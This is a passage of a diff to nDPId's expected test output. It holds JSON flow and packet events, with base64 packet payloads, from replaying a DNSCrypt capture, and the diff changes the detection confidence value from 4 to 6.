-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAIcwF1AAL0Rvf8KAAABstjJ3s99CAUCCD+NfSUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":310,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317462} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":310,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwFwAub0R\/xMKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwF4gAL0R2j4KAAABstjJ3sv9CAUGBG7NfSIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwF8gAL0R2j0KAAABstjJ3pbCCAUGBKQEfSYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":313,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317462} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwF4Aub0R\/xEKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":314,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317462} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":314,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwF8Aub0R\/xAKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAIcwGBAAL0RvfwKAAABstjJ3uV0CAUCCD+NfSMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":946739317463,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739317463,"pkt":"ZmZmZmZmRERERERECABFAADcYmkAADoRvwewOO2rCgAAAQG7v3AAyNgssmOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAABl3+ykQSZujAz2k88UgiWZ8EW8WsV\/cZTbX4vJmZY7W5pQMpzujkuwlfjXc+3bckBxwziAxuzLgEVuJhZegpADIiVqOfVhh6bINcwjX2cKXslxwpVLP3wwY1fcQglCKacmJWo59WGHpX1OncV9Tp3FfVPjx"} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":946739317493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739317493,"pkt":"ZmZmZmZmRERERERECABFAADUfxoAADgRxYuy2MneCgAAAQgFz30AwELIfSWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":946739317493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739317493,"pkt":"ZmZmZmZmRERERERECABFAADUfxkAADgRxYyy2MneCgAAAQgF6rsAwCeIfSeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="} @@ -643,24 +643,24 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739317496,"pkt":"ZmZmZmZmRERERERECABFAADUfxwAADgRxYmy2MneCgAAAQgF5XQAwCzTfSOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 